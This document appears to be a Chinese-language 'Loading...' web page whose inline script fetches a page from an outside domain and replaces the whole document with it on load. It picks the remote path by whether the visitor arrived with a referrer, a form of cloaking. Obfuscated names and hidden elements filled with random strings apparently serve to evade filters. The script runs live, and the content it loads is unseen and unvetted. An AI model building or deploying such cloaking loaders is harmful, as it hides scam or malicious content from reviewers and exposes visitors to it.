<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .n8CoVuV {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .n8CoVuV .Q8lCpHI {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .n8CoVuV .content {
            line-height: 50px;
            text-align: center
        }

        .n8CoVuV .img {
            width: 100%
        }

        .n8CoVuV .rg1qNhNDyro {
            text-align: center
        }

        .n8CoVuV .rg1qNhNDyro span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .n8CoVuV .rg1qNhNDyro span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .n8CoVuV .rg1qNhNDyro span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .n8CoVuV .rg1qNhNDyro span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .n8CoVuV .rg1qNhNDyro span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .n8CoVuV .rg1qNhNDyro span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .n8CoVuV .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function QKZPgMYhR(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var wUikP0 = QKZPgMYhR('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ wUikP0 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ wUikP0 +".html?a=share";
		}
		
        PjW3f7a5=url+"#"+new Date().getTime();
        PjW3f7a5 && function() {
            $.get(PjW3f7a5, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<span style='display:none'>OkCgA5oEeTxOAsALKrVooIJSYI7JxloqkKnTrtYPp8F4AACDKpqTn3nAZJL9c8WppYEiYsmt</span>
<b style='display:none' >R31RTuVUUGovrgryoqZH4DJbKzUqwhJkoz4wG30AlLl04atu4nvPcWXMVuR1hFKN2rQhndbrSYpUe5VLG7XTOhZJ</b>
<ul style='display:none' >hy2olzbbFp8DXv3MTMNQEcvFg6xSs4</ul>
<ul style='display:none' >hy2olzbbFp8DXv3MTMNQEcvFg6xSs4</ul>
<div style='display:none'>M2PNNwCyHB3Rt0p6ChIy4F4ccmPyms9PhiVSE6kHrRrV4HzwN76hNXI5agIKDVUitisqfvN5Jkf8i</div>
<div style='display:none'>M2PNNwCyHB3Rt0p6ChIy4F4ccmPyms9PhiVSE6kHrRrV4HzwN76hNXI5agIKDVUitisqfvN5Jkf8i</div><div class="n8CoVuV">
    <div class="Q8lCpHI">
        <div class="rg1qNhNDyro">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >MtNlPcpYLCx6CiWiMYFPwel0Yvc6Cs9oEaLOchH6ZDIbBQG3kzAl4UCwI7sgJ5YDEzicUVm94tWUduQ9yr</li>
<h1 style='display:none' >wSev9QwRwQFMZcxhGp1Dm16N1aBne4l</h1>
<li style='display:none' >MtNlPcpYLCx6CiWiMYFPwel0Yvc6Cs9oEaLOchH6ZDIbBQG3kzAl4UCwI7sgJ5YDEzicUVm94tWUduQ9yr</li>
<p  style='display:none'>jqoVgcilbC38z0DQhmLBjIKglvF1s1pl2Tfn9ZwyFJMZw6NxBMNHfvB72IHWuE9W44Xrzuir8MgN8O</p></body>
</html>